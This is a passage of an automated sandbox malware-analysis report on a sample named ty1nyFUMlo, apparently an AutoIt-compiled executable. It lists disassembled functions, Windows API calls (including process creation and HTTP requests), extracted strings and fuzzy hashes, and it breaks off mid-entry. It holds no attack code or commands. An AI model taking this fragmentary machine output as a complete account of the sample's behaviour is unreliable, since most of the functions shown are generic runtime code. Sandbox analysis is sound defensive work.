                                                                                                                        • Instruction Fuzzy Hash: 5D71E23260016B8BCF20DE7CC9515BE3FA2BFA5764F650529F8669B284E635CD84C7A0
                                                                                                                        Function 00517778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 0-1645009161
                                                                                                                        • Opcode ID: d059f09ab43d66ab29e86ac66bb09b5378973f2e4063f9acf8bec9693d90b8e7
                                                                                                                        • Instruction ID: 8b0ea2b4074395fc69489bc7cb3bfefd18196bf34bccab275f2d21d2cdcfb67c
                                                                                                                        • Opcode Fuzzy Hash: d059f09ab43d66ab29e86ac66bb09b5378973f2e4063f9acf8bec9693d90b8e7
                                                                                                                        • Instruction Fuzzy Hash: 5B81E67160460ABBEB20AF64DC56FEE3F78FF59300F044025F905AA192EB70D985D7A1
                                                                                                                        Function 005A856F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 131filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 005A8592
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005A85A2
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 005A85AD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005A85BA
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 005A85C8
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005A85D7
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 005A85E0
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005A85E7
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 005A85F8
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,?), ref: 005A8611
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 005A8621
                                                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 005A8641
                                                                                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 005A8671
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005A8699
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005A86AF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3840717409-2594219639
                                                                                                                        • Opcode ID: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                                                                                        • Instruction ID: 5f37d3b040e4651022a9867580da52e8007f0476a1de009eac8babf7375f861b
                                                                                                                        • Opcode Fuzzy Hash: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                                                                                        • Instruction Fuzzy Hash: 9E41E675600208BFDB119FA5DC48EAE7FB8FF9AB11F144059F905EB260DB309905DB60
                                                                                                                        Function 005730F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[]
                                                                                                                        • API String ID: 176396367-4125391415
                                                                                                                        • Opcode ID: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                                                                                        • Instruction ID: 4fce7546877220f89ca9fbb137fdb8872f5243ea5fc453e8c3f1c017bfd1431e
                                                                                                                        • Opcode Fuzzy Hash: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                                                                                        • Instruction Fuzzy Hash: FCE1E732A00516ABCF28DF78D4556EDBFB1BF44720F54C52AE45AA7240EB30AE85F790
                                                                                                                        Function 005A911E Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 005A9147
                                                                                                                          • Part of subcall function 005A7674: ClientToScreen.USER32(?,?), ref: 005A769A
                                                                                                                          • Part of subcall function 005A7674: GetWindowRect.USER32(?,?), ref: 005A7710
                                                                                                                          • Part of subcall function 005A7674: PtInRect.USER32(?,?,005A8B89), ref: 005A7720
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 005A91B0
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005A91BB
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005A91DE
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 005A9225
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 005A923E
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9255
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9277
                                                                                                                        • DragFinish.SHELL32(?), ref: 005A927E
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005A9371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u$p#^
                                                                                                                        • API String ID: 221274066-1984542035
                                                                                                                        • Opcode ID: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
                                                                                                                        • Instruction ID: b3122728a10f91d5f26426d0b86c766d0ab4d7bea99136e93a8158366580abd7
                                                                                                                        • Opcode Fuzzy Hash: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
                                                                                                                        • Instruction Fuzzy Hash: 3F613771108302AFD701DF54D889DAFBFE8FFD9750F00091AB595962A1DB309A49CB92
                                                                                                                        Function 005300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005300C6
                                                                                                                          • Part of subcall function 005300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(005E070C,00000FA0,BE39B01A,?,?,?,?,005523B3,000000FF), ref: 0053011C
                                                                                                                          • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005523B3,000000FF), ref: 00530127
                                                                                                                          • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005523B3,000000FF), ref: 00530138
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0053014E
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0053015C
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0053016A
                                                                                                                          • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00530195
                                                                                                                          • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005301A0
                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 005300E7
                                                                                                                          • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                                                                                        Strings
                                                                                                                        • WakeAllConditionVariable, xrefs: 00530162
                                                                                                                        • SleepConditionVariableCS, xrefs: 00530154
                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00530122
                                                                                                                        • kernel32.dll, xrefs: 00530133
                                                                                                                        • InitializeConditionVariable, xrefs: 00530148
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                        • Opcode ID: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                                                                                        • Instruction ID: 2b027beda6b6cd48bbc23366fbf28800fc68745221f96054de72aafd0fca023f
                                                                                                                        • Opcode Fuzzy Hash: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                                                                                        • Instruction Fuzzy Hash: 63212632A407116BE7256BA4BC59B2E7FE8FB56B61F00113AF801E72D1DBB09C04DB90
                                                                                                                        Function 005844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,005ACC08), ref: 00584527
                                                                                                                        • _wcslen.LIBCMT ref: 0058453B
                                                                                                                        • _wcslen.LIBCMT ref: 00584599
                                                                                                                        • _wcslen.LIBCMT ref: 005845F4
                                                                                                                        • _wcslen.LIBCMT ref: 0058463F
                                                                                                                        • _wcslen.LIBCMT ref: 005846A7
                                                                                                                          • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                                                                                        • GetDriveTypeW.KERNEL32(?,005D6BF0,00000061), ref: 00584743
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                        • Opcode ID: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                                                                                        • Instruction ID: 52e427e6f0860e730395d9f9e12390ecf223d89397b3e5b1e8fc89aba3b4b925
                                                                                                                        • Opcode Fuzzy Hash: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                                                                                        • Instruction Fuzzy Hash: F2B19D316083039BC710EF28C894A6EBBE5BFA5764F50491DF896E7291E730D985CB92
                                                                                                                        Function 005A6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 005A6DEB
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005A6E5F
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005A6E81
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6E94
                                                                                                                        • DestroyWindow.USER32(?), ref: 005A6EB5
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 005A6EE4
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6EFD
                                                                                                                        • GetDesktopWindow.USER32 ref: 005A6F16
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 005A6F1D
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A6F35
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005A6F4D
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                        • String ID: 0$@U=u$tooltips_class32
                                                                                                                        • API String ID: 2429346358-1130792468
                                                                                                                        • Opcode ID: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                                                                                        • Instruction ID: 3203997087ab0fa708173287b07fd1d54867da02243f37f160fb88a70989983f
                                                                                                                        • Opcode Fuzzy Hash: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                                                                                        • Instruction Fuzzy Hash: 92715B74144245AFDB25CF18DC84FABBFE9FB9A304F08041DF9998B2A1C770A949DB15
                                                                                                                        Function 0059AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0059B198
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1B0
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1D4
                                                                                                                        • _wcslen.LIBCMT ref: 0059B200
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B214
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B236
                                                                                                                        • _wcslen.LIBCMT ref: 0059B332
                                                                                                                          • Part of subcall function 005805A7: GetStdHandle.KERNEL32(000000F6), ref: 005805C6
                                                                                                                        • _wcslen.LIBCMT ref: 0059B34B
                                                                                                                        • _wcslen.LIBCMT ref: 0059B366
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0059B3B6
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0059B407
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059B439
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B44A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B45C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B46E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059B4E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178637699-0
                                                                                                                        • Opcode ID: a802dd83edef671cc6e922b0bf79ccfd73e64253612c266dd0a3944775f61d4c
                                                                                                                        • Instruction ID: 22fa9e0d10ca38dedbe654ad8102f7799fe74ffb57dea26696b9a8f2fa066a33
                                                                                                                        • Opcode Fuzzy Hash: a802dd83edef671cc6e922b0bf79ccfd73e64253612c266dd0a3944775f61d4c
                                                                                                                        • Instruction Fuzzy Hash: 20F189316043019FEB14EF24D999B6ABFE5BF85310F14895DF8899B2A2DB31EC44CB52
                                                                                                                        Function 0051326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(005E1990), ref: 00552F8D
                                                                                                                        • GetMenuItemCount.USER32(005E1990), ref: 0055303D
                                                                                                                        • GetCursorPos.USER32(?), ref: 00553081
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0055308A
                                                                                                                        • TrackPopupMenuEx.USER32(005E1990,00000000,?,00000000,00000000,00000000), ref: 0055309D
                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005530A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                        • Opcode ID: d7c98a3af3ab0c9bd6df4104012c2c044a401c71312918d80e350a9417940001
                                                                                                                        • Instruction ID: af02a0ea856ff7407d1511b743f0a84c1853f589062e0e377b662b911064c1d2
                                                                                                                        • Opcode Fuzzy Hash: d7c98a3af3ab0c9bd6df4104012c2c044a401c71312918d80e350a9417940001
                                                                                                                        • Instruction Fuzzy Hash: 59710C30640206BEFB259F64DC99FAABF68FF06364F204216F9256A1E0C7B1AD54D750
                                                                                                                        Function 0058C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C4B0
                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C4C3
                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C4D7
                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0058C4F0
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0058C533
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058C549
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C554
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C584
                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C5DC
                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C5F0
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0058C5FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                        • Opcode ID: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
                                                                                                                        • Instruction ID: 2b1830867d0f22beec1514f2e3adb9b94de766b10f3f2ae826bf00e9bb3cd1cd
                                                                                                                        • Opcode Fuzzy Hash: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
                                                                                                                        • Instruction Fuzzy Hash: 4F515DB1500205BFEB21AF64C948ABB7FFCFF19754F00441AF945A6210DB34E948AB70
                                                                                                                        Function 005814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00581502
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0058150B
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00581517
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005815FB
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00581657
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00581708
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0058178C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 005817D8
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 005817E7
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00581823
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 1234038744-3931177956
                                                                                                                        • Opcode ID: 20f2eb5d2d91abfd9fa27665fd2662d76610ecf7fddadbe8545b4fe00e8cf82f
                                                                                                                        • Instruction ID: 980ad9e6b04b45b22e0d3514e6d0f2b74c22002dd6da3711dbea11301e905e12
